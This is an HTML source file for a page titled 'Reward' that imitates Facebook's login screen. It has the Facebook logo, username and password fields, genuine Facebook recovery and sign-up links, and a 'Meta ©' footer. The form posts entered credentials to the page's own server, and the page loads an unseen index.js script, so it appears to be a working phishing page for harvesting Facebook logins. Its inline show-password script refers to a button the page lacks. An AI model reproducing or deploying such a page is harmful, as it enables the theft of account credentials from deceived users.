<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Reward</title>
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
    <div class="login-fb">
  <div class="info">
    <div class="logo">
      <img src="https://upload.wikimedia.org/wikipedia/commons/b/b9/2023_Facebook_icon.svg" alt="Logo">
    </div>
    <form method="post">
      <input class="user-name" type="text" placeholder="Mobile number or email address" id="user-input-1" name="User" required>
      <input class="user-password" type="password" placeholder="Password" id="user-input-2" name="Password" required>
      <input class="subm" type="submit" value="Log in">
      <a href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login" class="forgot">forgotten password?</a>
      <div class="new">
        <a href="https://web.facebook.com/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzA1MDkwNjgyLCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D">create new account</a>
      </div>
    </form>
  </div>
  </div>


    <p id="end">Meta &copy;</p>
  
  
    <script src="index.js" type="module"></script>
    <script>
        const showPassword = document.getElementById("show-pass-btn");
const passwordField = document.getElementById("user-input-2");

showPassword.addEventListener("click", () => {
  
  if (showPassword.textContent === "show") {
    passwordField.type = "text";
    showPassword.textContent = "hide";  
  } else {
    passwordField.type = "password";
    showPassword.textContent = "show";
  }
  
})
    </script>
  </body>
</html>
